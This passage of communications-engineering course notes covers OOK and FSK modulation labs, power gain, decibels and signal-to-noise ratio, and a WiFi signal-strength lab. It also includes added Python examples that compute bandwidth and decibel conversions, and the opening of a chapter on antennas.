9. Suppose the FCC has leased you the portion of the frequency spectrum from 1.2 MHz to 1.3 MHz for your free-space communication system. What is the maximum bitrate you could obtain if you used the following modulation schemes:
a. FSK, with fmark = 1.23 MHz and fspace = 1.27 MHz.
b. ASK.
c. BPSK.
d. 8-PSK.
e. 32-QAM.
f. 256-QAM.

Security Exercise 22
Digital Modulation: OOK and FSK

Discussion: A baseband signal is not compatible with free-space communication. Therefore, we need to modulate the binary 0s and 1s. Digital modulation is different from analog modulation in that the analog carrier signal is modulated by voltage pulses that represent 0s and 1s.

Objective: To provide hands-on experience and further familiarize each Midshipman with some of the aspects of the simplest form of Amplitude Shift Keying (ASK), known as On-Off Keying (OOK), as well as Frequency Shift Keying (FSK).

I. On-Off Keying (OOK)

In OOK, the amplitude of the digital signal controls the carrier signal, so that the carrier is turned on to represent a 1-bit and turned off to represent a 0-bit. Using your familiarity with the oscilloscope (o-scope) and function generator from your previous labs, set up the Function Generator with the following settings:
□ Press the Utility button and set your Output Setup to High Z.
□ Select the sinusoidal function by pressing the Sine button.
  o Freq = 300 kHz (this will be the carrier frequency, fc)
  o Ampl = 1 Vrms
□ Push the Mod button with the following settings:
  o TYPE = AM
  o SOURCE = Int
  o AM Depth = 100%
  o AM Freq = 10 kHz (this will be the bit rate)
  o SHAPE = Square
□ Connect the function generator Output (red to red, black to black) to CH 1 of the o-scope.
□ Connect the function generator Sync (red to red) to CH 2.
□ Push the Output button to send the signal to the o-scope.
□ Push AUTOSET on the o-scope.
□ Adjust the o-scope with CH 2 on top (square wave) and CH 1 (carrier) on the bottom using the vertical positions on CH 1 and CH 2.
□ Push the Trig Menu button on the o-scope and use the following settings:
  o TYPE = Edge
  o SOURCE = CH 2
  o SLOPE = Rising
  o MODE = Auto
  o Coupling = AC
  Note: You may need to adjust the Trigger level arrow to stabilize your display.
□ Push CH 1 MENU to return.
□ Adjust the horizontal range to 25 µsec per division, and adjust the CH 1 and CH 2 vertical scales (volts/div) so that you see a display similar to Fig. 1 that follows.
Note: Your scope display should look similar to Figure 1, below, except your digital signal is a square wave, 101010…

Figure 1

Question 1: Looking at CH 1 and using the time cursors, measure the carrier period and then calculate the carrier frequency, fc. Recall that the carrier is the rapidly changing sinusoid.

Question 2: Looking at CH 2, measure the bit duration Tb, then calculate the bitrate, Rb.

□ Change the o-scope to display the frequency domain by choosing MATH MENU and using the following settings:
  o OPERATION = FFT
  o SOURCE = CH 1
  o 50 kHz per Division
The o-scope should look similar to Figure 2 below.

Figure 2

Question 3: Find the carrier frequency from the o-scope display (hint: use the frequency cursor).

□ Use the frequency cursors to measure the bandwidth (hint: the bandwidth is determined by the first null to the left and right of the carrier).

Question 4: What is the bandwidth of the OOK signal (when fm = 10 kHz—that is, when Rb = 20 kbps)?
□ Change the AM Freq on the function generator to 20 kHz (so you are increasing your bit rate to 40 kbps).
□ Measure the bandwidth of the signal between the first pair of sidebands, as done in the previous step.

Question 5: Now, what is the bandwidth of the OOK signal (when fm = 20 kHz)?

Question 6: Based on Questions 4 and 5, describe what happens to the bandwidth of the signal as the bit rate increases. Remember that the equation for the bandwidth of an OOK signal is

$BW = \dfrac{2R_b}{N} = 2R_b$ (since $N = 1$ bit/symbol for OOK).

Your findings should be supported by this equation!

II. Frequency Shift Keying (FSK)

Frequency shift keying (FSK) is another digital modulation technique in which a continuous sine wave changes frequency when the digital bit stream changes between zero and one. The higher frequency represents a binary ‘1’ (also called mark) and the lower frequency represents a binary ‘0’ (also called space). FSK is used primarily in low speed applications (<500 kbps) and noisy environments where accuracy is preferred over speed. Keep the carrier frequency the same (fc is still 300 kHz), but change the modulation mode to FSK using the following steps:
□ Use the following modulation settings on the function generator (Mod):
  o TYPE = FM
  o SOURCE = Int
  o FREQ DEV = 200 kHz (this is the frequency deviation, Δf).
  o FM Freq = 10 kHz (this is the bit rate, Rb).
  o SHAPE = Square
□ Push CH 1 MENU on the o-scope to return to the time domain.
□ Set the horizontal scale to 25 µs per division.
Note: Your display should look similar to Figure 3, below, where a 1-bit is represented by a sinusoid with a frequency higher than the carrier’s (called the mark frequency) and a 0-bit with a frequency lower than the carrier’s (called the space frequency).

Figure 3

□ Adjust the picture on the o-scope to answer the next question by changing the horizontal range setting (sec/div) and using the time cursors to measure the periods of the two sinusoids.

Question 7: What is the mark frequency, fmark?
What is the space frequency, fspace?

□ To see the difference in the bandwidth for the FSK signal, shift to the frequency domain. Push the MATH MENU button and use the following settings:
  o OPERATION = FFT
  o SOURCE = CH 1
  o 125 kHz per Division
□ Measure the bandwidth between the sidebands (approximately) as shown in Figure 4. This is based on the first peak to the left of fspace and the first peak to the right of fmark.

Figure 4

Question 8: What is the measured bandwidth (hint: your answer should be much larger than your answer for the OOK bandwidth)? Remember that the equation for the bandwidth of an FSK signal is

$BW = (f_{mark} + R_b) - (f_{space} - R_b) = f_{mark} - f_{space} + 2R_b$, or $BW = 2(\Delta f + R_b)$.

Your answer should be supported by this equation!

□ Change the FM FREQ to 20 kHz (now Rb = 40 kbps) and measure the bandwidth of the signal as shown in Fig. 4.

Question 9: What is the new bandwidth?

Question 10: Based on the above change, as the bit rate (Rb) increases, describe what happens to the bandwidth of the signal. What can you say about the comparison of the bandwidths for FSK and OOK?

□ Turn off your equipment and clean up your lab bench.
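A bandwidth calculator, added here as an example and not part of the course notes, that applies the chapter's two rules (BW = 2Rb/N for OOK/ASK/PSK/QAM with N = log2 M, and BW = 2(Δf + Rb) for FSK) and inverts them for the allotted-band question of the chapter's Problem 9; the scheme names and the check that FSK tones lie inside the band are this example's own assumptions.

```python
"""Transmission bandwidth for the digital modulation schemes in the notes,
and the inverse problem: the highest bitrate that fits an allotted band.
Added example, not from the EC310 notes.  The scheme names, treating
OOK/ASK/BPSK as the M = 2 case, and the FSK band-fit check are assumptions
of this example."""
import math


def bits_per_symbol(m):
    """N = log2(M)."""
    n = math.log2(m)
    if n != int(n):
        raise ValueError("M must be a power of two")
    return int(n)


def bandwidth_hz(scheme, bitrate_bps, m=2, freq_dev_hz=None):
    """Bandwidth of one transmission.
    - OOK/ASK/PSK/QAM with M symbols: BW = 2*Rb/N, N = log2(M);
      OOK, ASK and BPSK are the M = 2, N = 1 case, so BW = 2*Rb.
    - FSK: BW = 2*(delta_f + Rb), delta_f being the frequency deviation."""
    scheme = scheme.upper()
    if scheme == "FSK":
        if freq_dev_hz is None:
            raise ValueError("FSK needs the frequency deviation")
        return 2 * (freq_dev_hz + bitrate_bps)
    if scheme in ("OOK", "ASK", "PSK", "QAM"):
        return 2 * bitrate_bps / bits_per_symbol(m)
    raise ValueError(f"unknown scheme {scheme}")


def max_bitrate_bps(scheme, band_low_hz, band_high_hz, m=2,
                    fmark_hz=None, fspace_hz=None):
    """Largest Rb whose bandwidth fits inside [band_low, band_high], found
    by inverting the formulas above.  For FSK the mark and space tones must
    themselves sit inside the band, and delta_f is half their separation."""
    bw = band_high_hz - band_low_hz
    if bw <= 0:
        raise ValueError("band must have positive width")
    scheme = scheme.upper()
    if scheme == "FSK":
        if fmark_hz is None or fspace_hz is None:
            raise ValueError("FSK needs fmark and fspace")
        lo, hi = sorted((fmark_hz, fspace_hz))
        if lo < band_low_hz or hi > band_high_hz:
            raise ValueError("mark/space tones fall outside the allotted band")
        delta_f = (hi - lo) / 2
        rb = bw / 2 - delta_f            # from BW = 2*(delta_f + Rb)
        if rb <= 0:
            raise ValueError("tones too far apart for any bitrate")
        return rb
    return bw * bits_per_symbol(m) / 2   # from BW = 2*Rb/N


def spectrum_table(bitrate_bps):
    """Bandwidth needed by the schemes compared in the chapter, one bitrate."""
    return {
        "OOK": bandwidth_hz("OOK", bitrate_bps),
        "BPSK": bandwidth_hz("PSK", bitrate_bps, m=2),
        "QPSK": bandwidth_hz("PSK", bitrate_bps, m=4),
        "8-PSK": bandwidth_hz("PSK", bitrate_bps, m=8),
        "16-QAM": bandwidth_hz("QAM", bitrate_bps, m=16),
        "256-QAM": bandwidth_hz("QAM", bitrate_bps, m=256),
    }


if __name__ == "__main__":
    for name, bw in spectrum_table(600_000).items():
        print(f"{name:8s} at 600 kbps needs {bw / 1e3:7.1f} kHz")
    # Band 1.2-1.3 MHz with FSK tones at 1.23 and 1.27 MHz (Problem 9 setup)
    print("FSK max bitrate (bps):",
          max_bitrate_bps("FSK", 1.2e6, 1.3e6, fmark_hz=1.23e6, fspace_hz=1.27e6))
```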
Security Exercise 22 Answer Sheet

Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:

Chapter 23: Power Gain and SNR

Objectives:
(m) Define gain and attenuation and describe their application to communications.
(n) Calculate power gains for single and multiple stage systems; determine power at each stage.
(o) Express power gain in dB, and power levels in dBW and dBm. Compute power gain and power from dB, dBW and dBm.
(p) Calculate signal to noise ratio (SNR) and discuss the impact of noise in a communication system.

Connection to Cyber Security

Communication systems transmit electrical (EM) signals to convey information. The strength of a signal is based on its electrical power, and the transmit power is an important consideration in how far a signal can be transmitted through the atmosphere.
In addition, the received power is an important factor in how accurately an information signal can be recovered; if the received power is not high enough to overcome the noise present, then information will be lost. Cyber security attacks against wireless communication systems can take advantage of the frequencies and modulation types of the transmission (Chapter 22), but also of the power that is received by a receiver. These attacks take the form of jamming, and possibly taking control of devices that are controlled via a wireless communication link if the received control signals from the actual transmitter are weaker than the received power from a hacker’s signal. In 2011, Iran captured a US unmanned aerial vehicle (UAV) while in flight, claiming that their cyberwarfare unit had commandeered and safely landed the UAV. This chapter introduces the power aspects of wireless communication.

1. Gain/Attenuation

Electrical power is measured in Watts (W); your typical flat screen TV uses maybe 250 W while it is on, and your laptop may use 60 W while it is running heavy-duty programs. In wireless communications, it may take an incredibly large transmit power to cover the distance to the receiver, and even then, the power arriving at the receiver may be incredibly small. For example, a commercial FM station may transmit 15.5 kW of signal power to reach your car’s radio, and by the time it gets to your car’s antenna, the received power may be on the order of 1 pW ($10^{-12}$ W). This means that the transmitted power has dropped by a factor of approximately $10^{16}$. Consider a satellite ground station (on Earth), transmitting to another ground station on the other side of the Earth via a geostationary satellite, 22,300 miles away. This is an immense distance to transmit over to reach the satellite! How about NASA’s New Horizons space probe mission, currently on its way to the planet Pluto…it will be transmitting information back to Earth from nearly 4 billion miles away!
So how are you going to get your signal to travel further? Turn up the power. But modulators that produce PSK or QAM typically do not produce signals of substantial power; instead we use devices called amplifiers to increase the power of the modulated signals (that is, to amplify them) so that they are strong enough to cover the required distances. The term power gain refers to the factor by which the power of a signal is increased as it goes through an amplifier. The power gain ($A_P$) is the ratio of the output signal power to the input signal power. In a block diagram of a communication system, an amplifier is typically drawn as a triangle (although rectangular blocks are also used), as in the following figure. To calculate power gain ($A_P$), where $P_{in}$ is the power input and $P_{out}$ is the power output, we use the equation:

$A_P = \dfrac{P_{out}}{P_{in}}$.

An amplifier can take a modulated signal and increase its power enough to transmit many miles, much like the above example of an FM radio broadcasting tower transmitting at 15.5 kW. There are, however, some components of communication systems that reduce the power of a signal. Reduction of the power of a signal (signal loss) is termed attenuation. Attenuation is still computed using the equation for power gain, but a component that attenuates has a power gain that is less than 1.0.

Putting together what we’ve learned, we have our modulated signal feeding into an amplifier that increases the power of the signal. The signal is broadcast out of the transmitter via an antenna, where the signal is attenuated as it travels through the air to the receiver’s antenna. Finally the significantly reduced signal is picked up by the receiver, and the receiver recovers the information. This is depicted in the following diagram for an ASK system.

Practice Problem 23.1
The input power of an amplifier is 6 W. The power gain is $A_P = 80$. What is the output power?

Practice Problem 23.2
The input power is 15.5 kW. The power output is $10^{-15}$ W.
Is this system associated with amplification or attenuation? What is the gain (or attenuation) of this system?

You may have noticed that there can be a large disparity in the power values between transmitter and receiver, and dealing with incredibly large and incredibly small values in the same system is challenging. For this reason, in many cases we deal with decibel values instead of the numeric values.

2. Decibels

As engineers, we just want our lives to be as easy as possible. So rather than work with these terribly tedious numbers, we often convert the numbers into decibels (dB). The decibel is a logarithmic measure that provides more convenient gain and attenuation values by changing them to a logarithmic scale. The benefit of a log scale is that it can map a very large range of decimal values into a small range of decibel values. Consequently, small changes in decibel quantities may mean very large changes in power (we’ll revisit this in the accompanying security exercise). The conversion of a decimal value X into the decibel value $X_{dB}$ is given by:

$X_{dB} = 10 \log_{10}(X)$.

If X is a value greater than 1.0, then $X_{dB}$ will be a positive value, and if X is a value less than 1.0, $X_{dB}$ will be a negative value. The decibel value of zero is negative infinity, and the decibel is undefined for negative values. For power gain (or attenuation) then:

$A_{P,dB} = 10 \log_{10}(A_P) = 10 \log_{10}\left(\dfrac{P_{out}}{P_{in}}\right)$.

So then for the above practice problem that gave us a headache, we see:

$A_{P,dB} = 10 \log_{10}\left(\dfrac{P_{out}}{P_{in}}\right) = 10 \log_{10}\left(\dfrac{0.000000000000001\ \text{W}}{15{,}500\ \text{W}}\right) = -181.9\ \text{dB}$

Practice Problem 23.3
Convert these two power gains to decibels (dB).
$A_P = 1000$
$A_P = 0.0001$

A couple of very common values of power gain are 2 and ½. A power amplification by a factor of two ($A_P = 2$) will result in a power gain of +3 dB.

$A_{P,dB} = 10 \log_{10}(A_P) = 10 \log_{10}(2) = +3\ \text{dB}$

An attenuation by a factor of one-half will result in a power gain of -3 dB.
$A_{P,dB} = 10 \log_{10}(A_P) = 10 \log_{10}(0.5) = -3\ \text{dB}$

How do you find the decimal value corresponding to a decibel value? Just rearrange the dB equation from earlier and you get:

$A_{P,dB} = 10 \log_{10}(A_P) \quad\Rightarrow\quad A_P = 10^{A_{P,dB}/10}$

Practice Problem 23.4
Convert the following power gains from decibels to decimal gains.
$A_{P,dB} = 25$ dB: $A_P$ =
$A_{P,dB} = -6$ dB: $A_P$ =

Power gain is a ratio of two powers, $P_{in}$ and $P_{out}$, each with a unit of power, usually W or mW. When taking this ratio, the units of power cancel, and you’re taking the log of a unitless ratio. Logarithms only work with numbers, not units. In communications, we are sometimes asked to compute the decibel value of a power level (in W or mW). In this case, you will take the log of that power level with respect to a fixed reference power level, either 1 W or 1 mW, so that the units cancel and you’re just taking the log of a number.

dBm: The number of decibels of power relative to 1 mW. The reference power level is 1 mW and the dBm value is expressed mathematically as

$P_{dBm} = 10 \log_{10}\left(\dfrac{P_{mW}}{1\ \text{mW}}\right)$ or $P_{dBm} = 10 \log_{10}\left(\dfrac{P_{W}}{0.001\ \text{W}}\right)$.

If the power value to compute is already in mW, the first equation can be used, and if the power value is in W, then the second equation can be used. In this case, since 1 mW = 0.001 W, the units will cancel.

dBW: The number of decibels of power relative to 1 W. The reference power level is 1 W and the dBW value is expressed mathematically as

$P_{dBW} = 10 \log_{10}\left(\dfrac{P_{W}}{1\ \text{W}}\right)$.

In all cases, the units of power must cancel so that the resulting ratio is unitless. Also, if given a dBm or dBW value, the power in mW or W can be found from:

$P(\text{in mW}) = 10^{P_{dBm}/10}$ or $P(\text{in W}) = 10^{P_{dBW}/10}$.

Practice Problem 23.5
Express $P_{in} = 2$ W in decibels as both dBm and dBW.
$P_{in,dBm}$ =
$P_{in,dBW}$ =

Practice Problem 23.6
Express 25 dBm in terms of mW and W.
P(in mW) =
P(in W) =

Besides compressing a large range of values into a smaller range of decibel values, another benefit of using decibels is the mathematics involved in combining decibel terms: decibel values are added or subtracted instead of multiplied or divided. This is typically seen in communication systems that cascade amplifiers, as in the following figure. Here, the output power after each amplifier is computed as the product of the power into that amplifier and its power gain. So, if we leave the gains in ratio form, then the total gain of the system will be the product of all the gains multiplied together, and we could rewrite this cascade of three amplifiers as a single amplifier with power gain $A_T$. In terms of decibels, the overall decibel gain of a cascade of amplifiers can be found as follows:

$A_{T,dB} = 10 \log_{10}(A_T) = 10 \log_{10}(A_{P1} \times A_{P2} \times A_{P3})$.

Using the property of the log function that the log of a product is the sum of the logs, we have:

$A_{T,dB} = 10 \log_{10}(A_{P1} \times A_{P2} \times A_{P3}) = 10 \log_{10}(A_{P1}) + 10 \log_{10}(A_{P2}) + 10 \log_{10}(A_{P3}) = A_{P1,dB} + A_{P2,dB} + A_{P3,dB}$

Also, we could use the property of the log function that the log of a quotient is the difference of the logs to write the following equation: . In this equation, the input and output powers must be in the same decibel units, either dBW or dBm. Note that the difference between two dBm or dBW values will result in a dB value. Applying the log of products property to a cascaded system of amplifiers,

$P_{out,dBm} = 10 \log_{10}(P_{in} \times A_{P1} \times A_{P2} \times A_{P3}) = 10 \log_{10}(P_{in}) + 10 \log_{10}(A_{P1}) + 10 \log_{10}(A_{P2}) + 10 \log_{10}(A_{P3}) = P_{in,dBm} + A_{P1,dB} + A_{P2,dB} + A_{P3,dB}$.

Here, it is okay that dB and dBm are mixed on the right side of the equation, because all of the decibel values represent unitless numbers; it’s just that the input and output power values’ decibel values must be computed relative to 1 mW.
If the input and output powers are in W instead of mW,

$P_{out,dBW} = P_{in,dBW} + A_{P1,dB} + A_{P2,dB} + A_{P3,dB}$.

Adding and subtracting decibels can be a much simpler operation than multiplying and dividing very large or very small decimal numbers. A common mistake midshipmen make when dealing with decibel values is multiplying or dividing them: you should NEVER, EVER multiply or divide decibel values. Decibels are always added to or subtracted from other decibels.

Practice Problem 23.7
The diagram below represents the first three stages of a typical AM or FM receiver. Find the following quantities.
(a) $A_T$ and $A_{T,dB}$
(b) $A_{P1,dB}$, $A_{P2,dB}$, and $A_{P3,dB}$.
(c) $P_1$, $P_2$, and $P_{out}$.
(d) $P_{in,dBm}$, $P_{1,dBm}$, $P_{2,dBm}$, and $P_{out,dBm}$.

3. Noise and the Signal-to-Noise Ratio (SNR)

Recall from Chapter 19 that noise is one of the principal limiting factors in the performance of communication systems, and that noise is added to our signal from external sources in the communication channel and also from internal (electronic) sources within our own system’s hardware. As we saw in Chapter 22, if significant enough, it can mask the original signal such that the signal becomes unrecoverable, or in the case of digital modulation, bit errors can occur. This noise effect is not much different than if an enemy were to flood the airwaves with an erroneous signal at the same frequency on which you were transmitting. If that erroneous signal was stronger at the receiver than your signal, your signal would become unrecoverable. How do we know the effect of noise on the signal, or the quality of the received signal in the face of noise? We use the signal-to-noise ratio (S/N, also referred to as SNR), which is the ratio of the power of a signal to the power of the noise corrupting that signal. A strong signal in weak noise results in a high SNR. A weak signal in strong noise results in a low SNR. Below are four samples of a sine wave with various amounts of noise added.
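The decibel bookkeeping of this section, as an added example that is not from the course notes: gain in dB, power in dBm and dBW, a cascade of stages in which attenuating links are negative dB entries, the signal-to-noise ratio used to judge whether a received signal is recoverable, and a receiver sensitivity check; the stage gains and power levels in the demo are constructed.

```python
"""Decibel bookkeeping for a communication link: gain/attenuation in dB,
power levels in dBm and dBW, a cascade of stages, and the signal-to-noise
ratio at the receiver.  Added example, not from the EC310 notes; the
stage gains and power levels used in the demo are constructed."""
import math


def to_db(ratio):
    """X_dB = 10 log10(X).  Only defined for positive ratios."""
    if ratio <= 0:
        raise ValueError("decibels are undefined for zero or negative values")
    return 10 * math.log10(ratio)


def from_db(value_db):
    """X = 10**(X_dB / 10)."""
    return 10 ** (value_db / 10)


def watts_to_dbm(p_w):
    """P_dBm = 10 log10(P_W / 0.001 W): power relative to 1 mW."""
    return to_db(p_w / 0.001)


def watts_to_dbw(p_w):
    """P_dBW = 10 log10(P_W / 1 W): power relative to 1 W."""
    return to_db(p_w / 1.0)


def dbm_to_watts(p_dbm):
    """P_W = 0.001 * 10**(P_dBm / 10)."""
    return 0.001 * from_db(p_dbm)


def cascade_gain_db(stage_gains_db):
    """Stages in series: the ratios multiply, so the dB values add.
    An attenuating stage (cable, free-space path) is a negative entry."""
    return sum(stage_gains_db)


def stage_powers_dbm(p_in_dbm, stage_gains_db):
    """Power in dBm at the input and after every stage (dBm + dB = dBm)."""
    levels = [p_in_dbm]
    for gain_db in stage_gains_db:
        levels.append(levels[-1] + gain_db)
    return levels


def snr_db(signal_w, noise_w):
    """SNR_dB = 10 log10(Ps / Pn).  'Noise' is whatever competes with the
    wanted signal at the receiver, including a stronger interfering signal."""
    return to_db(signal_w / noise_w)


def receiver_can_recover(received_w, sensitivity_dbm):
    """True when the received power is at or above the receiver's
    sensitivity (its minimum usable input), compared in the same unit."""
    return watts_to_dbm(received_w) >= sensitivity_dbm


if __name__ == "__main__":
    # Constructed chain: amplifier, cable loss, amplifier, path loss, amplifier
    gains = [20, -50, 60, -30, 10]
    total = cascade_gain_db(gains)
    print(f"total gain {total} dB = x{from_db(total):.0f}")
    print("levels along the chain (dBm):", stage_powers_dbm(0, gains))
    print(f"SNR for 5 nW signal in 2 nW noise: {snr_db(5e-9, 2e-9):.2f} dB")
    print("10 nW received, -70 dBm sensitivity:", receiver_can_recover(10e-9, -70))
    print("10 pW received, -70 dBm sensitivity:", receiver_can_recover(10e-12, -70))
```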
The signal-to-noise ratio indicates the relative strengths of the signal and the noise in a communication system. The stronger the signal and the weaker the noise, the higher the SNR. Mathematically, SNR is defined as:

$SNR = \dfrac{P_s}{P_n}$ and $SNR_{dB} = 10 \log_{10}\left(\dfrac{P_s}{P_n}\right)$.

Practice Problem 23.8
The signal power at the input to a receiver is 6.2 nW and the noise power at the input to that receiver is 1.8 nW. Find SNR and $SNR_{dB}$.

Problems
1. Convert power gains of 100, 1000 and 2000 to decibel values.
2. Convert power gains of 0.01, 0.001, and 0.0005 to decibel values.
3. Convert decibel power gains of 13 dB, 33 dB, and 103 dB to power gains.
4. Three amplifiers with gains of 12.5, 4, and 20 are cascaded as shown in the following diagram (from left to right). The input power is 120 mW. What is the overall gain and the output powers of each stage?
5. A power amplifier has an output power of 200 W and an input power of 8 W. What is the power gain in decibels?
6. A power amplifier has a gain of 55 dB. The input power is 600 mW. What is the output power in W?
7. An amplifier has an output power of 5 W. What is this amount of power in dBm?
8. A communication system has five stages, with gains and attenuations of 12 dB, -45 dB, 68 dB, -31 dB and 9 dB.
a. What is the overall gain in dB ($A_{T,dB}$)?
b. The overall power gain ($A_T$)?
c. If the input power is 1 dBm, what is the output power in dBm?
9. The signal input power to a receiver is 6 W. The noise power is 25 mW. What is the SNR? What is $SNR_{dB}$?
10. A receiver’s sensitivity is the minimum received signal power for the receiver to successfully recover the transmitted signal. If a receiver’s sensitivity is -45 dBm, and the received power is 10 μW, will the receiver be able to recover the transmitted signal?

Security Exercise 23
Introduction to Wireless Signals

Discussion: In the wireless section of the course so far, you have learned that we transmit information using EM waves in free space.
If we encode some meaningful data onto these waves, we can communicate without being physically tethered to the medium. But how far away can we be? How close to the transmitter must we be in order to receive the message and successfully recover the information? Just like our human voice only travels so far when we shout, radio waves only travel so far from the transmitting station. At some point, you will just be out of range. Fortunately, we can measure the strength of the transmitter (how loud it can “shout”) and the sensitivity of a receiver (how quiet a sound it can still “hear”). When we put these measurements on a logarithmic decibel scale and compare their utility, we can figure out things like: What is the optimal location for a transmitter? Where is the best spot to get reception? Which devices receive a better signal? These are things you probably do with your cell phone all the time. Today we will do an experiment and see if we can answer these questions scientifically.

Objective: To provide hands-on experience and further familiarize each Midshipman with power measurements in a wireless communication system, and the effects of distance from the transmitter to the receiver.

Set-up. Equipment required: your issued laptop; Xirrus software.

I. Measuring Signal Strength from your Local WiFi

□ On your laptop, check the wireless connections and you should see a list of devices. One of the devices is the wireless Access Point (AP) in your classroom named cyber2_xx. The xx is your room number. If you do not see the specific AP for your room, tell your instructor.
□ Once you see your cyber2 AP, start Xirrus Wi-Fi Inspector by double clicking the icon on your desktop.

Let’s explore the Xirrus Graphical User Interface (GUI) shown in the next figure. You should identify each of the following parts on the display (identified with letters a-e) and then perform any specific instructions on your laptop.
a) Start by clicking on Settings and turning “Locate Sound” to Off.
Click OK.
b) In the upper left is the “Radar Display.” This shows the relative signal strength of an AP. The stronger the AP, the closer it is to the middle of the display. It doesn’t correlate with the specific direction of the AP relative to you, but it will converge to the center as strength increases.
c) In the center top is “Connections”, which lists the details of the AP you are connected to.
d) Below that is “Networks”, which lists all of the APs you can observe with their respective data.
e) “Signal History” is a time versus signal strength (in dBm) graph of the AP you are trying to locate. Highlight the cyber2_xx node, then right click and choose “locate cyber2_xx”, and you should see it appear on the signal history plot.

Question 1: For your cyber2_xx AP, write the following details down in the lower left corner of the map on the solution page.
SSID (Service Set Identifier) - the wireless network name
BSSID (Basic Service Set Identifier) - the MAC address of the wireless interface unit
Channel - allows the carrier frequency to be separated into bands to keep from overlapping
Frequency - carrier frequency the AP is using for communications

□ Now that we have Xirrus running, we can take some measurements of the signal strength. Look at the Networks display list in the middle (d above), find your AP, highlight it and note the dBm.

Question 2: Record the signal strength noted for your AP in the table on the last page of the lab under “classroom”.

Question 3: Assume you record the signal strength of some other fictional access point when you are standing next to it as -30 dBm. Next, you walk some distance away from it and take another signal strength measurement and record it as 33 dBm. By what factor has the signal strength dropped from measurement one to measurement two? (Hint: convert each measurement to mW, then divide measurement two by measurement one.)
Recall that:

$P_{\text{mW}} = 10^{P_{\text{dBm}}/10}$

Keep this realization in mind when answering the following questions: A SMALL CHANGE IN DECIBELS CAN MEAN A LARGE CHANGE IN POWER!

Question 4: Staying highlighted on your assigned AP, move from point to point on the map and record the signal strength (dBm), allowing a period of time to let the value settle. Note that if the dBm falls much below -90 it may drop from your list. You can locate it again by returning closer to the classroom. Simply record -90 dBm if your AP is lost at any point on the map.

Question 5: Convert your dBm measurements to mW and finish filling in the table.

Question 6: Observations:
a) At what locations did you receive the strongest signal?
b) The weakest signal?
c) Would you expect to stay connected to this AP in Maury Hall?
d) Why?

Have an instructor check your results.

2. The Hunt for an Unknown AP

Understanding how Xirrus reads signal strength, we will now try to locate an unknown AP using the Xirrus program. This AP is not located in your classroom, but you should be able to pick up the signal in your hallway.
a) Try to find the AP with SSID Bad_Egg_xx (again with xx indicating your classroom).
b) Turn on the “Locate Sound” in Settings and change the polling time to 1 second. Right click on Bad_Egg_xx in the Networks list and select Locate. This will create a ping. The closer the pings are together, the stronger the AP’s signal.
c) Begin walking through the lab deck following your ping, dBm and Radar in a direction that makes the signal stronger.

Question 7: Where is the AP located? What is the message that is written on the AP?

Question 8: Emissions control in the military refers to controlling your Radio Frequency emissions. Keeping “The Hunt” from above in mind, why might it be important to maintain radio silence at certain times in the Navy and Marine Corps?

This SX was contributed by Captain Ryan Whitty, USMC.
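As an added example (not part of the lab handout), the following Python carries out the conversions Questions 3 and 5 call for: dBm to mW with the formula above, the linear factor between two readings, and filling in a signal-strength table with the -90 dBm floor the instructions give for a lost AP. The readings in READINGS and the -50 dBm / -53 dBm pair are constructed, not measured.

```python
import math

# Constructed lab-style readings (not from the handout): location -> signal strength in dBm.
# None marks a point where the AP dropped off the Xirrus list; the lab says to record -90 dBm there.
READINGS = {
    "classroom": -45,
    "hallway": -62,
    "stairwell": -78,
    "quad": None,
}
LOST_AP_DBM = -90  # floor value the instructions say to record when the AP is lost


def dbm_to_mw(p_dbm):
    """P(mW) = 10^(P(dBm)/10)."""
    return 10 ** (p_dbm / 10)


def mw_to_dbm(p_mw):
    """Inverse conversion: P(dBm) = 10 log10(P(mW))."""
    return 10 * math.log10(p_mw)


def power_ratio(p1_dbm, p2_dbm):
    """Linear factor between two readings: P2 / P1, both first converted to mW."""
    return dbm_to_mw(p2_dbm) / dbm_to_mw(p1_dbm)


def db_change_to_factor(delta_db):
    """The same factor computed straight from the dB difference: 10^(delta/10)."""
    return 10 ** (delta_db / 10)


def fill_table(readings):
    """Build the lab table rows: (location, dBm with the lost-AP floor applied, mW)."""
    rows = []
    for location, dbm in readings.items():
        dbm = LOST_AP_DBM if dbm is None else dbm
        rows.append((location, dbm, dbm_to_mw(dbm)))
    return rows


def strongest_and_weakest(rows):
    """Question 6 a/b: locations with the highest and lowest recorded signal strength."""
    best = max(rows, key=lambda r: r[1])
    worst = min(rows, key=lambda r: r[1])
    return best[0], worst[0]


if __name__ == "__main__":
    for location, dbm, mw in fill_table(READINGS):
        print(f"{location:10s} {dbm:5d} dBm  {mw:.3e} mW")
    # A 3 dB drop (constructed pair) halves the power: a small dB change, a large power change.
    print("-50 dBm -> -53 dBm is a factor of", power_ratio(-50, -53))
```

Because the conversion is exponential, the mW column spans many orders of magnitude even though the dBm column changes by tens of units, which is why the table is easier to read in dBm but the ratio question has to be answered in mW.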
Security Exercise 23 Answer Sheet

Name: ______________________

Questions 1/2/4/5:
Question 3: ______________________________________________________________________________
Question 6:
a)
b)
c)
d)
_________________________ Instructor/Lab Tech Signature
Question 7: ______________________________________________________________________________
Question 8:
a)
b)
______________________________________________________________________________

Chapter 24: Antennas

Objectives:
(a) Describe the role of an antenna in a wireless communication system.
(b) Explain the difference between power gain and antenna gain, and compute an antenna's gain relative to an isotropic point source (dBi).
(c) Describe the advantages and disadvantages of directional antennas.
(d) Describe the role of directors and reflectors in the design of a Yagi antenna.
(e) Interpret an antenna's radiation pattern to determine the sidelobe level and front-to-back ratio in dB, the beamwidth, and the directions from which interfering or eavesdropping antennas may lie.

Connection to Cyber Security

Modulated signals are amplified to raise their power (Chapter 23), and then, if free space is the communication channel, transmitted and received using an antenna. A necessary part of a free-space communication system, antennas serve as the bridge from the transmitter and receiver to the communication channel. However, unlike a wire-based communication system, free space is an open medium, and anyone with an antenna can collect transmitted signals or transmit their own signals. This makes free-space systems particularly vulnerable to cyber attacks involving eavesdropping and jamming.

I. Antenna Characteristics

An antenna is a device that provides a transition between guided electromagnetic waves in electrical circuits and electromagnetic waves in free space, and can be a length of wire, a metal rod, or a piece of metal tubing.
Recall that the wavelength (λ) and frequency (f) of an electromagnetic wave in free space are related by the speed of light (c), where c = 3.0 × 10^8 m/s:

$\lambda = \frac{c}{f}$

